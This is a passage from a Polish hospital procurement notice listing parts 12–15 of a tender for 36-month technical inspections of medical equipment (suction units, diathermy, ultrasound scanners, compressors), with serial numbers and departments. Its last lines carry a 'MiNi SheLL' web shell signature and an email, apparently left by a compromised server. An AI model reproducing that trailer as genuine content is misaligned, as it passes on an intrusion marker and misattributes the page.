<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	SZYNOWY REGULATOR SSANIA WYSOKOCIŚNIENIOWEGO         nr 11846011	 S713R 	Oddział Neurologiczny 	1
   2.	SZYNOWY REGULATOR SSANIA WYSOKOCIŚNIENIOWEGO        nr 11846018	 S713R 	Oddział Neurologiczny 	1
   3.	SZYNOWY REGULATOR SSANIA WYSOKOCIŚNIENIOWEGO       nr  1179024	 S713R 	Oddział Neurologiczny 	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Przeglądy techniczne cieplarki i diatermi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	DIATERMIA ELEKTROCHIRURGICZNA	ICC 80	  GINEKOLOGIA	1
   2.	Cieplarka                /  nr 40779830                                         	B6060               	SOR  	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Przeglądy techniczne Ssaków i podgrzewaczy płynów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	 SSAK  ELEKTRYCZNY  nr 20753	 SU - 2	WEWNĘTRZNY	1
2.	 SSAK OB2012          nr 1000910098	BSU158	ZESPOŁY RATOWNICTWA MEDYCZNEGO	1
3.	SSAK  OB2012           nr 1000910068	BSU158 	ZESPOŁY RATOWNICTWA MEDYCZNEGO ( ZALEWO)	1
4.	SSAK   OB1000               nr  2000610409	BSU 204	ZESPOŁY RATOWNICTWA MEDYCZNEGO  ( SUSZ)	1
5.	SSAK  OB1000                 nr  1000910085	BSU 220	ZESPOŁY RATOWNICTWA MEDYCZNEGO	1
6.	SSAK  OB1000                 nr  2000710190	BSU 220	ZESPOŁY RATOWNICTWA MEDYCZNEGO	1
7.	SSAK BASIC                     nr 11552	ACCUVAV	ZESPOŁY RATOWNICTWA MEDYCZNEGO	1
8.	SSAK ELEKTRYCZNY          nr  1031163	SO-2  2005	Poradnia Otolaryngologiczna 	1
9.	SSAK RĘCZNY                       nr 729124371	 	 Poradnia Medycyny Paliatywnej	1
10.	SSAK RĘCZNY                       nr 729124372	 	 Poradnia Medycyny Paliatywnej	1
11.	SSAK ELEKTRYCZNY           nr 1403429	M-20 	Oddział Pediatryczny	1
12.	SSAK ELEKTRYCZNY                                 0104/379/07	SO-4	Oddział Pediatryczny	1
13.	Podgrzewacz do krwi i płynów        nr  07330096	ANIMEC AM-2S 	Oddział Anestezjologii	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Przeglądy techniczne ultrasonografu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	LOGIQ P 5            nr  9273 OSU1		ODDZ. POŁOŻNICZO -NOWORODKOWY	1
2.	LOGIQ 3 PRO  nr  44285WS5	2007	Ginekologiczny	1
3.	USG HS-200                nr 025	2006	          SOR	1
4.	TOHIBA XG SSA - 580A ULTRASONOGRAF nr  55600A00E   DRUKARKA MITSUBICHI		PRACOWNIA USG  	1
5.	 USG si 450        nr UE 5149E38	1995	    PORADNIA  UROLOGICZNA	1
6.	Vivid 3             nr  P264	2001	WEWNĘTRZNY	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Przeglądy techniczne sprężarki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	SPRĘŻARKA  NR 1	Pomieszczenie 046	10349027-0291 / 2002	1
  2.	SPRĘŻARKA  NR 2	Pomieszczenie 046	10349027-0292 / 2002	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com